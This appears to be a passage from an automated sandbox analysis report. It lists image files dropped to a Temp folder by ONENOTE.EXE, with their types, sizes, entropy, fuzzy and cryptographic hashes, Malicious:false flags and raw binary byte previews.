                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{00693321-994C-43DB-9AA3-F5B0990C211D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{01B48DA2-3894-4B60-AD18-7D6FE695222E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{02E4112E-2DC2-4162-9252-4B6921B8C6AE}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{04A25502-9F38-4CEA-A305-D98A4F71DEDD}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{04B640CD-C0A7-4F74-AA6B-032E4FFE0BDA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{04F0960A-8CEA-4D5E-A6B4-1BDA730B5F57}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{054A4787-88B6-4B2C-9983-A6558D576B30}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0683A374-F099-4668-AF8C-F85BCB507346}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{06C12566-7EFC-43F5-A600-7B5E036DAE23}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0730253F-0F0A-48E7-97D2-1CD96EBBC4D1}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{08B723F8-BB4C-4880-AAE5-05AE537CCF55}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0B4B1C24-BF25-44BD-9CD8-7A432F3E240F}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0BD4EFB3-FD55-448F-9C54-6A80B6907C1B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
